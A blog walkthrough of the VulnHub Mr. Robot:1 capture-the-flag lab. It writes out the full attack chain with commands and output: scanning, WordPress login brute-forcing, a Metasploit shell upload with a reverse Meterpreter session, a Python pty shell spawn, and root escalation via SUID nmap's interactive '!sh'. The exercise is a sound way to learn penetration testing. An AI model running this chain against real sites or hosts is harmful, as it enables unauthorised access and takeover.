As an Amazon Prime subscriber I noticed that the show Mr. Robot is now available for no extra cost. Since I’ve heard a lot about the show, I was curious to see what the fuss was all about.  When I was watching it and got over the initial cringe factor of some of the overtly techno-jargon dialog, I was motivated to hit up VulnHub and see if there were any new Boot2Roots that looked interesting. Lo and behold I saw Mr. Robot:1.

The description for this challenge is:

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Let’s Begin!

First I need to find the IP of the target so I fireup Netdiscover:

root@Oak:~# netdiscover -r 10.0.2.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.0.2.1        52:54:00:12:35:00      1      60  Unknown vendor              
 10.0.2.2        52:54:00:12:35:00      1      60  Unknown vendor              
 10.0.2.3        08:00:27:f6:13:d8      1      60  Cadmus Computer Systems     
 10.0.2.33       08:00:27:c3:f8:59      1      60  Cadmus Computer Systems

Target acquired!

Enumeration time

root@Oak:~# nmap -p- -A -sV -T5 10.0.2.33

Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-11 10:51 EDT
Nmap scan report for 10.0.2.33
Host is up (0.00029s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:C3:F8:59 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 10.0.2.33

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.07 seconds

Interesting, only 80 and 443. Let’s see what we have here, I think Nikto will get the job done nicely…

root@Oak:~# nikto -h http://10.0.2.33
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.33
+ Target Hostname:    10.0.2.33
+ Target Port:        80
+ Start Time:         2016-07-11 10:55:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: <http://10.0.2.33/?p=23>; rel=shortlink
+ /ampache/update.php: Ampache update page is visible.
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-login.php?action=register: WordPress registration enabled
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ 7535 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2016-07-11 11:00:45 (GMT-4) (302 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Ahh, ok so this is a WordPress site. Let’s take a look at what Nikto found and see if we can glean some interesting information.

The Robots.txt file contained the 1st of 3 keys along with a dictionary file.

User-agent: *
fsocity.dic
key-1-of-3.txt
Key #1: 073403c8a58a1f80d943455fb30724b9

I found what appears to be a password while looking at the License.txt file. Hiding in plain sight. Very interesting….

The license.txt file contained some interesting taunts.

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?
[White Space Removed]
do you want a password or something?
[White Space Removed]
ZWxsaW90OkVSMjgtMDY1Mgo=

Hmm, I wonder what this password goes to? (At the time I did not realize this was base64 encoded. I should have recognized the formatting, but I didn’t so I wasted a lot of time on the next part.)

Well, since it’s a WordPress site, I launched WPscan against it.

root@Oak:~# wpscan -u http://10.0.2.33 -e vp
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.0.2.33/
[+] Started: Mon Jul 11 11:17:58 2016

[+] robots.txt available under: 'http://10.0.2.33/robots.txt'
[!] The WordPress 'http://10.0.2.33/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[!] Registration is enabled: http://10.0.2.33/wp-login.php?action=register
[+] XML-RPC Interface available under: http://10.0.2.33/xmlrpc.php

[+] WordPress version 4.3.4 identified from advanced fingerprinting (Released on 2016-05-06)
[!] 3 vulnerabilities identified from the version number

[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
    Reference: https://wpvulndb.com/vulnerabilities/8518
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.3.5

[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8519
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
    Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.3.5

[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
    Reference: https://wpvulndb.com/vulnerabilities/8520
    Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
    Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.3.5

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:01:02 <=======================> (1344 / 1344) 100.00% Time: 00:01:02

[+] We found 6 plugins:

[+] Name: akismet
 |  Latest version: 3.1.11 
 |  Location: http://10.0.2.33/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: all-in-one-seo-pack - v2.0.4
 |  Location: http://10.0.2.33/wp-content/plugins/all-in-one-seo-pack/
 |  Readme: http://10.0.2.33/wp-content/plugins/all-in-one-seo-pack/readme.txt
[!] The version is out of date, the latest version is 2.3.6.1

[!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS
    Reference: https://wpvulndb.com/vulnerabilities/6888
    Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation
    Reference: https://wpvulndb.com/vulnerabilities/6889
    Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.2.5.1 - Authentication Bypass
    Reference: https://wpvulndb.com/vulnerabilities/7881
    Reference: http://jvn.jp/en/jp/JVN75615300/index.html
    Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
[i] Fixed in: 2.2.6

[!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7916
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 2.2.6.2

[+] Name: all-in-one-wp-migration - v2.0.4
 |  Location: http://10.0.2.33/wp-content/plugins/all-in-one-wp-migration/
 |  Readme: http://10.0.2.33/wp-content/plugins/all-in-one-wp-migration/readme.txt
[!] The version is out of date, the latest version is 5.44

[!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export
    Reference: https://wpvulndb.com/vulnerabilities/7857
    Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability
    Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export
[i] Fixed in: 2.0.5

[+] Name: google-analytics-for-wordpress - v5.3.2
 |  Location: http://10.0.2.33/wp-content/plugins/google-analytics-for-wordpress/
 |  Readme: http://10.0.2.33/wp-content/plugins/google-analytics-for-wordpress/readme.txt
[!] The version is out of date, the latest version is 5.5.2

[!] Title: Google Analytics by Yoast <= 5.3.2 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7838
    Reference: http://packetstormsecurity.com/files/130716/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.2 - Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7856
    Reference: https://yoast.com/ga-plugin-security-update-more/
    Reference: http://klikki.fi/adv/yoast_analytics.html
    Reference: http://packetstormsecurity.com/files/130935/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.3 - Unauthenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7914
    Reference: https://yoast.com/coordinated-security-release/
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
    Reference: http://klikki.fi/adv/yoast_analytics2.html
[i] Fixed in: 5.4

[!] Title: Google Analytics by Yoast <= 5.4.4 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8147
    Reference: https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/
[i] Fixed in: 5.4.5

[+] Name: jetpack - v3.3.2
 |  Location: http://10.0.2.33/wp-content/plugins/jetpack/
 |  Readme: http://10.0.2.33/wp-content/plugins/jetpack/readme.txt
[!] The version is out of date, the latest version is 4.1.1

[!] Title: Jetpack 3.0-3.4.2 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7915
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
    Reference: https://jetpack.me/2015/04/20/jetpack-3-4-3-coordinated-security-update/
[i] Fixed in: 3.4.3

[!] Title: Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7964
    Reference: https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
[i] Fixed in: 3.5.3

[!] Title: Jetpack <= 3.7.0 - Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8201
    Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.7.0 - Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8202
    Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.9.1 - LaTeX HTML Element XSS
    Reference: https://wpvulndb.com/vulnerabilities/8472
    Reference: https://jetpack.com/2016/02/25/jetpack-3-9-2-maintenance-and-security-release/
    Reference: https://github.com/Automattic/jetpack/commit/dbc33b9105c4dbb0de81544e682a8b6d5ab7e446
[i] Fixed in: 3.9.2

[!] Title: Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8500
    Reference: https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/
    Reference: http://wptavern.com/jetpack-4-0-3-patches-a-critical-xss-vulnerability
    Reference: https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html
[i] Fixed in: 4.0.3

[!] Title: Jetpack <= 4.0.3 - Multiple Vulnerabilities
    Reference: https://wpvulndb.com/vulnerabilities/8517
    Reference: https://jetpack.com/2016/06/20/jetpack-4-0-4-bug-fixes/
[i] Fixed in: 4.0.4

[+] Name: wptouch - v3.7.3
 |  Location: http://10.0.2.33/wp-content/plugins/wptouch/
 |  Readme: http://10.0.2.33/wp-content/plugins/wptouch/readme.txt
[!] The version is out of date, the latest version is 4.1.7

[!] Title: WPtouch Mobile Plugin <= 3.7.5.3 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7920
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 3.7.6

[+] Finished: Mon Jul 11 11:19:07 2016
[+] Requests Done: 1412
[+] Memory used: 70.09 MB
[+] Elapsed time: 00:01:09

Lot’s of vulnerable plug-ins. WordPress is out of date, but no RCE’s are available for anything listed.

Now I needed a way in. I figured the dictionary file would be the key to get into the WordPress site, I just needed an username. WPscan was no help there.

I tried to manually guess usernames based off of the characters names from the show and see if the failed login error message was any help. And indeed it was!

When attempting to login with an username that doesn’t exist, you get the following error message:

ERROR: Invalid username.

However, when you attempt to do the same with an existing username, the message changes:

ERROR: The password you entered for the username elliot is incorrect.

Excellent, now I know the username, let’s go all brute on it and force my way in!

I read somewhere that WPscan bruteforce was faster than THC-Hydra, so back to WPScan for this task.

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  [+] [SUCCESS] Login : elliot Password : ER28-0652                             

  Brute Forcing 'elliot' Time: 05:35:13 <========> (858160 / 858161) 99.99%  ETA: 00:00:00
  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Mon Jul 10 05:37:53 2016
[+] Requests Done: 858204
[+] Memory used: 18.516 MB
[+] Elapsed time: 05:35:14</pre>
It took about 5 and a half hours, but it finally finished! (Again, I could have saved time if I was more thoughtful. The base64 encoded <a href="http://ZWxsaW90OkVSMjgtMDY1Mgo=">password</a> I found earlier decoded to elliot:ER28-0652)

Now that I had a username and password I could log in and look around. Unfortunalty I didn't see anything too interesting.

Next, I fired up msfconsole and used the wp_admin_shell_upload exploit.
<pre>msf exploit(wp_admin_shell_upload) > info

 Name: WordPress Admin Shell Upload
 Module: exploit/unix/webapp/wp_admin_shell_upload
 Platform: PHP
 Privileged: No
 License: Metasploit Framework License (BSD)
 Rank: Excellent
 Disclosed: 2015-02-21

Provided by:
 Rob Carr <rob@rastating.com>

Available targets:
 Id Name
 -- ----
 0 WordPress

Basic options:
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 PASSWORD ER28-0652 yes The WordPress password to authenticate with
 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
 RHOST 10.0.2.33 yes The target address
 RPORT 80 yes The target port
 SSL false no Negotiate SSL/TLS for outgoing connections
 TARGETURI / yes The base path to the wordpress application
 USERNAME elliot yes The WordPress username to authenticate with
 VHOST no no HTTP server virtual host

Payload information:

Description:
 This module will generate a plugin, pack the payload into it and 
 upload it to a server running WordPress providing valid admin 
 credentials are used.</pre>
At first it wouldn't work. The exploit did not want to believe that it was a WordPress site.
<pre>msf exploit(wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.0.2.33:4444 
[-] Exploit aborted due to failure: not-found: The target does not appear to be using WordPress
[*] Exploit completed, but no session was created.</pre>
So I went into the ruby code and bypassed the WP check.
<pre> Reloading module...

My second attempt was much better, BAM we have a Meterpreter session!

msf exploit(wp_admin_shell_upload) > sessions

Active sessions
===============

 Id Type Information Connection
 -- ---- ----------- ----------
 1 meterpreter php/php daemon (1) @ linux 10.0.2.32:4444 -> 10.0.2.33:55928 (10.0.2.33)

I took a look around and booYah! Key #2 found!

meterpreter > ls
Listing: /home/robot
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100400/r--------  33    fil   2015-11-13 02:28:21 -0500  key-2-of-3.txt
100644/rw-r--r--  39    fil   2015-11-13 02:28:21 -0500  password.raw-md5

Not so fast Danielson… the current user cannot read the key text file, but I can read the password.raw-md5 file.

meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
meterpreter >

Simple Google search of that MD5 string revealed the password…

abcdefghijklmnopqrstuvwxyz

I drop into a shell, spawn a bash shell using Python and change the user to robot

meterpreter > shell
Process 6231 created.
Channel 15 created.
python -c 'import pty;pty.spawn("/bin/bash")'
daemon@linux:/home/robot$ su robot
su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ cat /home/robot/key-2-of-3.txt
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$

Now I can say booYah! Key #2 found!

Ok now I need to escalate.

I do some recon for privilege escalation exploits and I find that nmap is suid to root.

robot@linux:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Nmap has an interactive feature with a nice escape sequence that opens the keys to the kingdom when incorrectly configured.

robot@linux:~$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
#

Shazam! I have root. Or as Mati would say, “nice”.

Key 3 is in the bag!

cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Closing Remarks

This was a fun Boot2Root that complimented the show nicely. The method to complete this challenge was similar to what was learned in the PWK course. I look forward to future Mr.Robot challenges. Now I must decide if I want to pay to watch season 2 or wait until it comes out on Amazon. Stay tuned for the next pwnventure!

References:

  1. Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
  2. Mr-Robot: 1: https://www.vulnhub.com/entry/mr-robot-1,151/
  3. Penetration Testing Training with Kali Linux: https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/
Advertisements